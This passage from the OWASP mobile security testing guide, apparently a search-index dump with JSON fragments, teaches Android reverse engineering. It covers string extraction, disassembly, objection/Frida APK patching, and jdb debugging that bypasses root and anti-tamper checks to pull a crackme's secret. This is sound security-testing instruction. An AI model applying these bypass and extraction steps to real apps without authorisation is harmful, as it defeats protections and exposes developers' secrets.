Code analysis is not a quick operation, and not even predictable or taking a linear time to be processed. This makes starting times pretty heavy, compared to just loading the headers and strings information like it\u2019s done by default.
People that are used to IDA or Hopper just load the binary, go out to make a coffee and then when the analysis is done, they start doing the manual analysis to understand what the program is doing. It\u2019s true that those tools perform the analysis in background, and the GUI is not blocked. But this takes a lot of CPU time, and r2 aims to run in many more platforms than just high-end desktop computers.
This said, please see section \"Reviewing Disassembled Native Code\" to learn more about how radare2 can help us perform our reversing tasks much faster. For example, getting the disassembly of a specific function is a trivial task that can be performed in one command.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0018/#ida-pro","title":"IDA Pro","text":"If you own an IDA Pro license, open the file and once in the \"Load new file\" dialog, choose \"ELF for ARM (Shared Object)\" as the file type (IDA should detect this automatically), and \"ARM Little-Endian\" as the processor type.
The freeware version of IDA Pro unfortunately does not support the ARM processor type.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/","title":"Retrieving Strings","text":"While performing any kind of binary analysis, strings can be considered as one of the most valuable starting points as they provide context. For example, an error log string like \"Data encryption failed.\" gives us a hint that the adjoining code might be responsible for performing some kind of encryption operation.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/#java-and-kotlin-bytecode","title":"Java and Kotlin Bytecode","text":"As we already know, all the Java and Kotlin bytecode of an Android application is compiled into a DEX file. Each DEX file contains a list of string identifiers (strings_ids), which contains all the string identifiers used in the binary whenever a string is referred, including internal naming (e.g, type descriptors) or constant objects referred by the code (e.g hardcoded strings). You can simply dump this list using tools such as Ghidra (GUI based) or Dextra (CLI based).
With Ghidra, strings can be obtained by simply loading the DEX file and selecting Window -> Defined strings in the menu.
Loading an APK file directly into Ghidra might lead to inconsistencies. Thus it is recommended to extract the DEX file by unzipping the APK file and then loading it into Ghidra.
With Dextra, you can dump all the strings using the following command:
dextra -S classes.dex\n
The output from Dextra can be manipulated using standard Linux commands, for example, using grep
to search for certain keywords.
It is important to know that the list of strings obtained using the above tools can be very big, as it also includes the various class and package names used in the application. Going through the complete list, especially for big binaries, can be very cumbersome. Thus, it is recommended to start with keyword-based searching and go through the list only when keyword search does not help. Some generic keywords which can be a good starting point are - password, key, and secret. Other useful keywords specific to the context of the app can be obtained while you are using the app itself. For instance, imagine that the app has a login form, you can take note of the displayed placeholder or title text of the input fields and use that as an entry point for your static analysis.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0019/#native-code","title":"Native Code","text":"In order to extract strings from native code used in an Android application, you can use GUI tools such as Ghidra or iaito or rely on CLI-based tools such as the strings Unix utility (strings <path_to_binary>
) or radare2's rabin2 (rabin2 -zz <path_to_binary>
). When using the CLI-based ones you can take advantage of other tools such as grep (e.g. in conjunction with regular expressions) to further filter and analyze the results.
There are many RE tools that support retrieving Java cross references. For many of the GUI-based ones, this is usually done by right clicking on the desired function and selecting the corresponding option, e.g. Show References to in Ghidra or Find Usage in jadx.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0020/#native-code","title":"Native Code","text":"Similarly to Java analysis, you can also use Ghidra to analyze native libraries and obtain cross references by right clicking the desired function and selecting Show References to.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0021/","title":"Information Gathering - API Usage","text":"The Android platform provides many in-built libraries for frequently used functionalities in applications, for example cryptography, Bluetooth, NFC, network or location libraries. Determining the presence of these libraries in an application can give us valuable information about its nature.
For instance, if an application is importing javax.crypto.Cipher
, it indicates that the application will be performing some kind of cryptographic operation. Fortunately, cryptographic calls are very standard in nature, i.e, they need to be called in a particular order to work correctly, this knowledge can be helpful when analyzing cryptography APIs. For example, by looking for the Cipher.getInstance
function, we can determine the cryptographic algorithm being used. With such an approach we can directly move to analyzing cryptographic assets, which often are very critical in an application. Further information on how to analyze Android's cryptographic APIs is discussed in the section \"Android Cryptographic APIs\".
Similarly, the above approach can be used to determine where and how an application is using NFC. For instance, an application using Host-based Card Emulation for performing digital payments must use the android.nfc
package. Therefore, a good starting point for NFC API analysis would be to consult the Android Developer Documentation to get some ideas and start searching for critical functions such as processCommandApdu
from the android.nfc.cardemulation.HostApduService
class.
Most of the apps you might encounter connect to remote endpoints. Even before you perform any dynamic analysis (e.g. traffic capture and analysis), you can obtain some initial inputs or entry points by enumerating the domains to which the application is supposed to communicate to.
Typically these domains will be present as strings within the binary of the application. One way to achieve this is by using automated tools such as APKEnum or MobSF. Alternatively, you can grep for the domain names by using regular expressions. For this you can target the app binary directly or reverse engineer it and target the disassembled or decompiled code. The latter option has a clear advantage: it can provide you with context, as you'll be able to see in which context each domain is being used (e.g. class and method).
From here on you can use this information to derive more insights which might be of use later during your analysis, e.g. you could match the domains to the pinned certificates or the Network Security Configuration file or perform further reconnaissance on domain names to know more about the target environment. When evaluating an application it is important to check the Network Security Configuration file, as often (less secure) debug configurations might be pushed into final release builds by mistake.
The implementation and verification of secure connections can be an intricate process and there are numerous aspects to consider. For instance, many applications use other protocols apart from HTTP such as XMPP or plain TCP packets, or perform certificate pinning in an attempt to deter MITM attacks but unfortunately have severe logical bugs in their implementation or an inherently wrong network security configuration.
Remember that in most of the cases, just using static analysis will not be enough and might even turn out to be extremely inefficient when compared to the dynamic alternatives which will get much more reliable results (e.g. using an interceptor proxy). In this section we've just slightly touched the surface, please refer to the section \"Basic Network Monitoring/Sniffing\" in the \"Android Basic Security Testing\" chapter and also check the test cases in the \"Android Network Communication\" chapter.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0023/","title":"Reviewing Decompiled Java Code","text":"Following the example from \"Decompiling Java Code\", we assume that you've successfully decompiled and opened the UnCrackable App for Android Level 1 in IntelliJ. As soon as IntelliJ has indexed the code, you can browse it just like you'd browse any other Java project. Note that many of the decompiled packages, classes, and methods have weird one-letter names; this is because the bytecode has been \"minified\" with ProGuard at build time. This is a basic type of obfuscation that makes the bytecode a little more difficult to read, but with a fairly simple app like this one, it won't cause you much of a headache. When you're analyzing a more complex app, however, it can get quite annoying.
When analyzing obfuscated code, annotating class names, method names, and other identifiers as you go along is a good practice. Open the MainActivity
class in the package sg.vantagepoint.uncrackable1
. The method verify
is called when you tap the \"verify\" button. This method passes the user input to a static method called a.a
, which returns a boolean value. It seems plausible that a.a
verifies user input, so we'll refactor the code to reflect this.
Right-click the class name (the first a
in a.a
) and select Refactor -> Rename from the drop-down menu (or press Shift-F6). Change the class name to something that makes more sense given what you know about the class so far. For example, you could call it \"Validator\" (you can always revise the name later). a.a
now becomes Validator.a
. Follow the same procedure to rename the static method a
to check_input
.
Congratulations, you just learned the fundamentals of static analysis! It is all about theorizing, annotating, and gradually revising theories about the analyzed program until you understand it completely or, at least, well enough for whatever you want to achieve.
Next, Ctrl+click (or Command+click on Mac) on the check_input
method. This takes you to the method definition. The decompiled method looks like this:
public static boolean check_input(String string) {\n    byte[] arrby = Base64.decode((String) \\\n        \"5UJiFctbmgbDoLXmpL12mkno8HT4Lv8dlat8FxR2GOc=\", (int)0);\n    byte[] arrby2 = new byte[]{};\n    try {\n        arrby = sg.vantagepoint.a.a.a(Validator.b(\"8d127684cbc37c17616d806cf50473cc\"), arrby);\n        arrby2 = arrby;\n    }\n    catch (Exception exception) {\n        Log.d((String)\"CodeCheck\", (String)(\"AES error:\" + exception.getMessage()));\n    }\n    if (string.equals(new String(arrby2))) {\n        return true;\n    }\n    return false;\n    }\n
So, you have a Base64-encoded String that's passed to the function a
in the package \\ sg.vantagepoint.a.a
(again, everything is called a
) along with something that looks suspiciously like a hex-encoded encryption key (16 hex bytes = 128bit, a common key length). What exactly does this particular a
do? Ctrl-click it to find out.
public class a {\n public static byte[] a(byte[] object, byte[] arrby) {\n object = new SecretKeySpec((byte[])object, \"AES/ECB/PKCS7Padding\");\n Cipher cipher = Cipher.getInstance(\"AES\");\n cipher.init(2, (Key)object);\n return cipher.doFinal(arrby);\n }\n}\n
Now you're getting somewhere: it's simply standard AES-ECB. Looks like the Base64 string stored in arrby1
in check_input
is a ciphertext. It is decrypted with 128bit AES, then compared with the user input. As a bonus task, try to decrypt the extracted ciphertext and find the secret value!
A faster way to get the decrypted string is to add dynamic analysis. We'll revisit UnCrackable App for Android Level 1 later to show how (e.g. in the Debugging section), so don't delete the project yet!
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/","title":"Reviewing Disassembled Native Code","text":"Following the example from \"Disassembling Native Code\" we will use different disassemblers to review the disassembled native code.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#radare2","title":"radare2","text":"Once you've opened your file in radare2 you should first get the address of the function you're looking for. You can do this by listing or getting information i
about the symbols s
(is
) and grepping (~
radare2's built-in grep) for some keyword, in our case we're looking for JNI related symbols so we enter \"Java\":
$ r2 -A HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n...\n[0x00000e3c]> is~Java\n003 0x00000e78 0x00000e78 GLOBAL FUNC 16 Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI\n
The method can be found at address 0x00000e78
. To display its disassembly simply run the following commands:
[0x00000e3c]> e emu.str=true;\n[0x00000e3c]> s 0x00000e78\n[0x00000e78]> af\n[0x00000e78]> pdf\n\u256d (fcn) sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI 12\n\u2502 sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI (int32_t arg1);\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 0x00000e78 ~ 0268 ldr r2, [r0] ; arg1\n\u2502 ;-- aav.0x00000e79:\n\u2502 ; UNKNOWN XREF from aav.0x00000189 (+0x3)\n\u2502 0x00000e79 unaligned\n\u2502 0x00000e7a 0249 ldr r1, aav.0x00000f3c ; [0xe84:4]=0xf3c aav.0x00000f3c\n\u2502 0x00000e7c d2f89c22 ldr.w r2, [r2, 0x29c]\n\u2502 0x00000e80 7944 add r1, pc ; \"Hello from C++\" section..rodata\n\u2570 0x00000e82 1047 bx r2\n
Let's explain the previous commands:
e emu.str=true;
enables radare2's string emulation. Thanks to this, we can see the string we're looking for (\"Hello from C++\").s 0x00000e78
is a seek to the address s 0x00000e78
, where our target function is located. We do this so that the following commands apply to this address.pdf
means print disassembly of function.Using radare2 you can quickly run commands and exit by using the flags -qc '<commands>'
. From the previous steps we know already what to do so we will simply put everything together:
$ r2 -qc 'e emu.str=true; s 0x00000e78; af; pdf' HelloWord-JNI/lib/armeabi-v7a/libnative-lib.so\n\n\u256d (fcn) sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI 12\n\u2502 sym.Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI (int32_t arg1);\n\u2502 ; arg int32_t arg1 @ r0\n\u2502 0x00000e78 0268 ldr r2, [r0] ; arg1\n\u2502 0x00000e7a 0249 ldr r1, [0x00000e84] ; [0xe84:4]=0xf3c\n\u2502 0x00000e7c d2f89c22 ldr.w r2, [r2, 0x29c]\n\u2502 0x00000e80 7944 add r1, pc ; \"Hello from C++\" section..rodata\n\u2570 0x00000e82 1047 bx r2\n
Notice that in this case we're not starting with the -A
flag nor running
. Instead, we just tell radare2 to analyze that one function by using the analyze function af
command. This is one of those cases where we can speed up our workflow because you're focusing on some specific part of an app.
The workflow can be further improved by using r2ghidra, a deep integration of Ghidra decompiler for radare2. r2ghidra generates decompiled C code, which can aid in quickly analyzing the binary.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#ida-pro","title":"IDA Pro","text":"We assume that you've successfully opened lib/armeabi-v7a/libnative-lib.so
in IDA pro. Once the file is loaded, click into the \"Functions\" window on the left and press Alt+t
to open the search dialog. Enter \"java\" and hit enter. This should highlight the Java_sg_vantagepoint_helloworld_ MainActivity_stringFromJNI
function. Double-click the function to jump to its address in the disassembly Window. \"Ida View-A\" should now show the disassembly of the function.
Not a lot of code there, but you should analyze it. The first thing you need to know is that the first argument passed to every JNI function is a JNI interface pointer. An interface pointer is a pointer to a pointer. This pointer points to a function table: an array of even more pointers, each of which points to a JNI interface function (is your head spinning yet?). The function table is initialized by the Java VM and allows the native function to interact with the Java environment.
With that in mind, let's have a look at each line of assembly code.
LDR R2, [R0]\n
Remember: the first argument (in R0) is a pointer to the JNI function table pointer. The LDR
instruction loads this function table pointer into R2.
LDR R1, =aHelloFromC\n
This instruction loads into R1 the PC-relative offset of the string \"Hello from C++\". Note that this string comes directly after the end of the function block at offset 0xe84. Addressing relative to the program counter allows the code to run independently of its position in memory.
LDR.W R2, [R2, #0x29C]\n
This instruction loads the function pointer from offset 0x29C into the JNI function pointer table pointed to by R2. This is the NewStringUTF
function. You can look at the list of function pointers in jni.h, which is included in the Android NDK. The function prototype looks like this:
jstring (*NewStringUTF)(JNIEnv*, const char*);\n
The function takes two arguments: the JNIEnv pointer (already in R0) and a String pointer. Next, the current value of PC is added to R1, resulting in the absolute address of the static string \"Hello from C++\" (PC + offset).
ADD R1, PC\n
Finally, the program executes a branch instruction to the NewStringUTF
function pointer loaded into R2:
BX R2\n
When this function returns, R0 contains a pointer to the newly constructed UTF string. This is the final return value, so R0 is left unchanged and the function returns.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0024/#ghidra","title":"Ghidra","text":"After opening the library in Ghidra we can see all the functions defined in the Symbol Tree panel under Functions. The native library for the current application is relatively very small. There are three user defined functions: FUN_001004d0
, FUN_0010051c
, and Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
. The other symbols are not user defined and are generated for proper functioning of the shared library. The instructions in the function Java_sg_vantagepoint_helloworldjni_MainActivity_stringFromJNI
are already discussed in detail in previous sections. In this section we can look into the decompilation of the function.
Inside the current function there is a call to another function, whose address is obtained by accessing an offset in the JNIEnv
pointer (found as plParm1
). This logic has been diagrammatically demonstrated above as well. The corresponding C code for the disassembled function is shown in the Decompiler window. This decompiled C code makes it much easier to understand the function call being made. Since this function is small and extremely simple, the decompilation output is very accurate, this can change drastically when dealing with complex functions.
You should use tools for efficient static analysis. They allow the tester to focus on the more complicated business logic. A plethora of static code analyzers are available, ranging from open source scanners to full-blown enterprise-ready scanners. The best tool for the job depends on budget, client requirements, and the tester's preferences.
Some static analyzers rely on the availability of the source code; others take the compiled APK as input. Keep in mind that static analyzers may not be able to find all problems by themselves even though they can help us focus on potential problems. Review each finding carefully and try to understand what the app is doing to improve your chances of finding vulnerabilities.
Configure the static analyzer properly to reduce the likelihood of false positives and maybe only select several vulnerability categories in the scan. The results generated by static analyzers can otherwise be overwhelming, and your efforts can be counterproductive if you must manually investigate a large report.
There are several open source tools for automated security analysis of an APK.
Non-rooted devices have the benefit of replicating an environment that the application is intended to run on.
Thanks to tools like objection, you can patch the app in order to test it as if you were on a rooted device (but of course being jailed to that one app). To do that you have to perform one additional step: patch the APK to include the Frida gadget library.
Now you can use objection to dynamically analyze the application on non-rooted devices.
The following commands summarize how to patch and start dynamic analysis using objection using the UnCrackable App for Android Level 1 as an example:
# Download the Uncrackable APK\n$ wget https://raw.githubusercontent.com/OWASP/owasp-mastg/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk\n# Patch the APK with the Frida Gadget\n$ objection patchapk --source UnCrackable-Level1.apk\n# Install the patched APK on the android phone\n$ adb install UnCrackable-Level1.objection.apk\n# After running the mobile phone, objection will detect the running frida-server through the APK\n$ objection explore\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0027/","title":"Get Open Files","text":"You can use lsof
with the flag -p <pid>
to return the list of open files for the specified process. See the man page for more options.
# lsof -p 6233\nCOMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME\n.foobar.c 6233 u0_a97 cwd DIR 0,1 0 1 /\n.foobar.c 6233 u0_a97 rtd DIR 0,1 0 1 /\n.foobar.c 6233 u0_a97 txt REG 259,11 23968 399 /system/bin/app_process64\n.foobar.c 6233 u0_a97 mem unknown /dev/ashmem/dalvik-main space (region space) (deleted)\n.foobar.c 6233 u0_a97 mem REG 253,0 2797568 1146914 /data/dalvik-cache/arm64/system@framework@boot.art\n.foobar.c 6233 u0_a97 mem REG 253,0 1081344 1146915 /data/dalvik-cache/arm64/system@framework@boot-core-libart.art\n...\n
In the above output, the most relevant fields for us are:
NAME
: path of the file.TYPE
: type of the file, for example, whether the file is a directory or a regular file. This can be extremely useful to spot unusual files when monitoring applications using obfuscation or other anti-reverse engineering techniques, without having to reverse the code. For instance, an application might be performing encryption-decryption of data and storing it in a file temporarily.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0028/","title":"Get Open Connections","text":"You can find system-wide networking information in /proc/net
or just by inspecting the /proc/<pid>/net
directories (for some reason not process specific). There are multiple files present in these directories, of which tcp
, tcp6
and udp
might be considered relevant from the tester's perspective.
# cat /proc/7254/net/tcp\nsl local_address rem_address st tx_queue rx_queue tr tm->when retrnsmt uid timeout inode\n...\n69: 1101A8C0:BB2F 9A447D4A:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75412 1 0000000000000000 20 3 19 10 -1\n70: 1101A8C0:917C E3CB3AD8:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75553 1 0000000000000000 20 3 23 10 -1\n71: 1101A8C0:C1E3 9C187D4A:01BB 01 00000000:00000000 00:00000000 00000000 10093 0 75458 1 0000000000000000 20 3 19 10 -1\n...\n
In the output above, the most relevant fields for us are:
rem_address
: remote address and port number pair (in hexadecimal representation).tx_queue
and rx_queue
: the outgoing and incoming data queue in terms of kernel memory usage. These fields give an indication how actively the connection is being used.uid
: containing the effective UID of the creator of the socket.Another alternative is to use the netstat
command, which also provides information about the network activity for the complete system in a more readable format, and can be easily filtered as per our requirements. For instance, we can easily filter it by PID:
# netstat -p | grep 24685\nActive Internet connections (w/o servers)\nProto Recv-Q Send-Q Local Address Foreign Address State PID/Program Name\ntcp 0 0 192.168.1.17:47368 172.217.194.103:https CLOSE_WAIT 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:47233 172.217.194.94:https CLOSE_WAIT 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:38480 sc-in-f100.1e100.:https ESTABLISHED 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:44833 74.125.24.91:https ESTABLISHED 24685/com.google.android.youtube\ntcp 0 0 192.168.1.17:38481 sc-in-f100.1e100.:https ESTABLISHED 24685/com.google.android.youtube\n...\n
netstat
output is clearly more user friendly than reading /proc/<pid>/net
. The most relevant fields for us, similar to the previous output, are the following:
Foreign Address
: remote address and port number pair (port number can be replaced with the well-known name of a protocol associated with the port).Recv-Q
and Send-Q
: Statistics related to receive and send queue. Gives an indication on how actively the connection is being used.State
: the state of a socket, for example, if the socket is in active use (ESTABLISHED
) or closed (CLOSED
).The file /proc/<pid>/maps
contains the currently mapped memory regions and their access permissions. Using this file we can get the list of the libraries loaded in the process.
# cat /proc/9568/maps\n12c00000-52c00000 rw-p 00000000 00:04 14917 /dev/ashmem/dalvik-main space (region space) (deleted)\n6f019000-6f2c0000 rw-p 00000000 fd:00 1146914 /data/dalvik-cache/arm64/system@framework@boot.art\n...\n7327670000-7329747000 r--p 00000000 fd:00 1884627 /data/app/com.google.android.gms-4FJbDh-oZv-5bCw39jkIMQ==/oat/arm64/base.odex\n..\n733494d000-7334cfb000 r-xp 00000000 fd:00 1884542 /data/app/com.google.android.youtube-Rl_hl9LptFQf3Vf-JJReGw==/lib/arm64/libcronet.80.0.3970.3.so\n...\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0029/#using-frida","title":"Using Frida","text":"You can retrieve process related information straight from the Frida CLI by using the Process
command. Within the Process
command the function enumerateModules
lists the libraries loaded into the process memory.
[Huawei Nexus 6P::sg.vantagepoint.helloworldjni]-> Process.enumerateModules()\n[\n {\n \"base\": \"0x558a442000\",\n \"name\": \"app_process64\",\n \"path\": \"/system/bin/app_process64\",\n \"size\": 32768\n },\n {\n \"base\": \"0x78bc984000\",\n \"name\": \"libandroid_runtime.so\",\n \"path\": \"/system/lib64/libandroid_runtime.so\",\n \"size\": 2011136\n },\n...\n
"},{"location":"MASTG/techniques/android/MASTG-TECH-0030/","title":"Sandbox Inspection","text":"The application data is stored in a sandboxed directory present at /data/data/<app_package_name>
. The content of this directory has already been discussed in detail in the \"Accessing App Data Directories\" section.
So far, you've been using static analysis techniques without running the target apps. In the real world, especially when reversing malware or more complex apps, pure static analysis is very difficult. Observing and manipulating an app during runtime makes it much, much easier to decipher its behavior. Next, we'll have a look at dynamic analysis methods that help you do just that.
Android apps support two different types of debugging: Debugging on the level of the Java runtime with the Java Debug Wire Protocol (JDWP), and Linux/Unix-style ptrace-based debugging on the native layer, both of which are valuable to reverse engineers.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-release-apps","title":"Debugging Release Apps","text":"Dalvik and ART support the JDWP, a protocol for communication between the debugger and the Java virtual machine (VM) that it debugs. JDWP is a standard debugging protocol that's supported by all command line tools and Java IDEs, including jdb, IntelliJ, and Eclipse. Android's implementation of JDWP also includes hooks for supporting extra features implemented by the Dalvik Debug Monitor Server (DDMS).
A JDWP debugger allows you to step through Java code, set breakpoints on Java methods, and inspect and modify local and instance variables. You'll use a JDWP debugger most of the time you debug \"normal\" Android apps (i.e., apps that don't make many calls to native libraries).
In the following section, we'll show how to solve the UnCrackable App for Android Level 1 with jdb alone. Note that this is not an efficient way to solve this crackme. Actually you can do it much faster with Frida and other methods, which we'll introduce later in the guide. This, however, serves as an introduction to the capabilities of the Java debugger.
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-with-jdb","title":"Debugging with jdb","text":"The adb
command line tool was introduced in the \"Android Basic Security Testing\" chapter. You can use its adb jdwp
command to list the process IDs of all debuggable processes running on the connected device (i.e., processes hosting a JDWP transport). With the adb forward
command, you can open a listening socket on your host computer and forward this socket's incoming TCP connections to the JDWP transport of a chosen process.
$ adb jdwp\n12167\n$ adb forward tcp:7777 jdwp:12167\n
You're now ready to attach jdb. Attaching the debugger, however, causes the app to resume, which you don't want. You want to keep it suspended so that you can explore first. To prevent the process from resuming, pipe the suspend
command into jdb:
$ { echo \"suspend\"; cat; } | jdb -attach localhost:7777\nInitializing jdb ...\n> All threads suspended.\n>\n
You're now attached to the suspended process and ready to go ahead with the jdb commands. Entering ?
prints the complete list of commands. Unfortunately, the Android VM doesn't support all available JDWP features. For example, the redefine
command, which would let you redefine a class code is not supported. Another important restriction is that line breakpoints won't work because the release bytecode doesn't contain line information. Method breakpoints do work, however. Useful working commands include:
Let's revisit the decompiled code from the UnCrackable App for Android Level 1 and think about possible solutions. A good approach would be suspending the app in a state where the secret string is held in a variable in plain text so you can retrieve it. Unfortunately, you won't get that far unless you deal with the root/tampering detection first.
Review the code and you'll see that the method sg.vantagepoint.uncrackable1.MainActivity.a
displays the \"This in unacceptable...\" message box. This method creates an AlertDialog
and sets a listener class for the onClick
event. This class (named b
) has a callback method will terminates the app once the user taps the OK button. To prevent the user from simply canceling the dialog, the setCancelable
method is called.
private void a(final String title) {\n final AlertDialog create = new AlertDialog$Builder((Context)this).create();\n create.setTitle((CharSequence)title);\n create.setMessage((CharSequence)\"This in unacceptable. The app is now going to exit.\");\n create.setButton(-3, (CharSequence)\"OK\", (DialogInterface$OnClickListener)new b(this));\n create.setCancelable(false);\n create.show();\n }\n
You can bypass this with a little runtime tampering. With the app still suspended, set a method breakpoint on android.app.Dialog.setCancelable
and resume the app.
> stop in android.app.Dialog.setCancelable\nSet breakpoint android.app.Dialog.setCancelable\n> resume\nAll threads resumed.\n>\nBreakpoint hit: \"thread=main\", android.app.Dialog.setCancelable(), line=1,110 bci=0\nmain[1]\n
The app is now suspended at the first instruction of the setCancelable
method. You can print the arguments passed to setCancelable
with the locals
command (the arguments are shown incorrectly under \"local variables\").
main[1] locals\nMethod arguments:\nLocal variables:\nflag = true\n
setCancelable(true)
was called, so this can't be the call we're looking for. Resume the process with the resume
command.
main[1] resume\nBreakpoint hit: \"thread=main\", android.app.Dialog.setCancelable(), line=1,110 bci=0\nmain[1] locals\nflag = false\n
You've now reached a call to setCancelable
with the argument false
. Set the variable to true
with the set
command and resume.
main[1] set flag = true\n flag = true = true\nmain[1] resume\n
Repeat this process, setting flag
to true
each time the breakpoint is reached, until the alert box is finally displayed (the breakpoint will be reached five or six times). The alert box should now be cancelable! Tap the screen next to the box and it will close without terminating the app.
Now that the anti-tampering is out of the way, you're ready to extract the secret string! In the \"static analysis\" section, you saw that the string is decrypted with AES, then compared with the string input to the message box. The method equals
of the java.lang.String
class compares the string input with the secret string. Set a method breakpoint on java.lang.String.equals
, enter an arbitrary text string in the edit field, and tap the \"verify\" button. Once the breakpoint is reached, you can read the method argument with the locals
command.
> stop in java.lang.String.equals\nSet breakpoint java.lang.String.equals\n>\nBreakpoint hit: \"thread=main\", java.lang.String.equals(), line=639 bci=2\n\nmain[1] locals\nMethod arguments:\nLocal variables:\nother = \"radiusGravity\"\nmain[1] cont\n\nBreakpoint hit: \"thread=main\", java.lang.String.equals(), line=639 bci=2\n\nmain[1] locals\nMethod arguments:\nLocal variables:\nother = \"I want to believe\"\nmain[1] cont\n
This is the plaintext string you're looking for!
"},{"location":"MASTG/techniques/android/MASTG-TECH-0031/#debugging-with-an-ide","title":"Debugging with an IDE","text":"Setting up a project in an IDE with the decompiled sources is a neat trick that allows you to set method breakpoints directly in the source code. In most cases, you should be able to single-step through the app and inspect the state of variables with the GUI. The experience won't be perfect, it's not the original source code after all, so you won't be able to set line breakpoints and things will sometimes simply not work correctly. Then again, reversing code is never easy, and efficiently navigating and debugging plain old Java code is a pretty convenient way of doing it. A similar method has been described in the NetSPI blog.
To set up IDE debugging, first create your Android project in IntelliJ and copy the decompiled Java sources into the source folder as described above in the \"Reviewing Decompiled Java Code\" section. On the device, choose the app as debug app on the \"Developer options\" (UnCrackable App for Android Level 1 in this tutorial), and make sure you've switched on the \"Wait For Debugger\" feature.
Once you tap the app icon from the launcher, it will be suspended in \"Wait For Debugger\" mode.
Now you can set breakpoints and attach to the app process with the \"Attach Debugger\" toolbar button.
Note that only method breakpoints work when debugging an app from decompiled sources. Once a method breakpoint is reached, you'll get the chance to single step during the method execution.
After you choose the app from the list, the debugger will attach to the app process and you'll reach the breakpoint that was set on the onCreate
method. This app triggers anti-debugging and anti-tampering controls within the onCreate
method. That's why setting a breakpoint on the onCreate
method just before the anti-tampering and anti-debugging checks are performed is a good idea.
Next, single-step through the onCreate
method by clicking \"Force Step Into\" in Debugger view. The \"Force Step Into\" option allows you to debug the Android framework functions and core Java classes that are normally ignored by debuggers.
Once you \"Force Step Into\", the debugger will stop at the beginning of the next method, which is the a
method of the class sg.vantagepoint.a.c
.
This method searches for the \"su\" binary within a list of directories (/system/xbin
and others). Since you're running the app on a rooted device/emulator, you need to defeat this check by manipulating variables and/or function return values.
You can see the directory names inside the \"Variables\" window by clicking \"Step Over\" the Debugger view to step into and through the a
method.
Step into the System.getenv
method with the \"Force Step Into\" feature.
After you get the colon-separated directory names, the debugger cursor will return to the beginning of the a
method, not to the next executable line. This happens because you're working on the decompiled code instead of the source code. This skipping makes following the code flow crucial to debugging decompiled applications. Otherwise, identifying the next line to be executed would become complicated.
If you don't want to debug core Java and Android classes, you can step out of the function by clicking \"Step Out\" in the Debugger view. Using \"Force Step Into\" might be a good idea once you reach the decompiled sources and \"Step Out\" of the core Java and Android classes. This will help speed up debugging while you keep an eye on the return values of the core class functions.
After the a
method gets the directory names, it will search for the su
binary within these directories. To defeat this check, step through the detection method and inspect the variable content. Once execution reaches a location where the su
binary would be detected, modify one of the variables holding the file name or directory name by pressing F2 or right-clicking and choosing \"Set Value\".
Once you modify the binary name or the directory name, File.exists
should return false
.
This defeats the first root detection control of the app. The remaining anti-tampering and anti-debugging controls can be defeated in similar ways so that you can finally reach the secret string verification functionality.
The secret code is verified by the method a
of class sg.vantagepoint.uncrackable1.a
. Set a breakpoint on method a
and \"Force Step Into\" when you reach the breakpoint. Then, single-step until you reach the call to String.equals
. This is where user input is compared with the secret string.
You can see the secret string in the \"Variables\" view when you reach the String.equals
method call.
Native code on Android is packed into ELF shared libraries and runs just like any other native Linux program. Consequently, you can debug it with standard tools (including GDB and built-in IDE debuggers such as IDA Pro) as long as they support the device's processor architecture (most devices are based on ARM chipsets, so this is usually not an issue).
You'll now set up your JNI demo app, HelloWorld-JNI.apk, for debugging. It's the same APK you downloaded in \"Statically Analyzing Native Code\". Use adb install
to install it on your device or on an emulator.
adb install HelloWorld-JNI.apk\n
If you followed the instructions at the beginning of this chapter, you should already have the Android NDK. It contains prebuilt versions of gdbserver for various architectures. Copy the gdbserver binary to your device:
adb push $NDK/prebuilt/android-arm/gdbserver/gdbserver /data/local/tmp\n
The gdbserver --attach
command causes gdbserver to attach to the running process and bind to the IP address and port specified in comm
, which in this case is a HOST:PORT descriptor. Start HelloWorldJNI on the device, then connect to the device and determine the PID of the HelloWorldJNI process (sg.vantagepoint.helloworldjni). Then switch to the root user and attach gdbserver
:
$ adb shell\n$ ps | grep helloworld\nu0_a164 12690 201 1533400 51692 ffffffff 00000000 S sg.vantagepoint.helloworldjni\n$ su\n# /data/local/tmp/gdbserver --attach localhost:1234 12690\nAttached; pid = 12690\nListening on port 1234\n
The process is now suspended, and gdbserver
is listening for debugging clients on port 1234
. With the device connected via USB, you can forward this port to a local port on the host with the abd forward
command:
adb forward tcp:1234 tcp:1234\n
You'll now use the prebuilt version of gdb
included in the NDK toolchain.
$ $TOOLCHAIN/bin/gdb libnative-lib.so\nGNU gdb (GDB) 7.11\n(...)\nReading symbols from libnative-lib.so...(no debugging symbols found)...done.\n(gdb) target remote :1234\nRemote debugging using :1234\n0xb6e0f124 in ?? ()\n
You have successfully attached to the process! The only problem is that you're already too late to debug the JNI function StringFromJNI
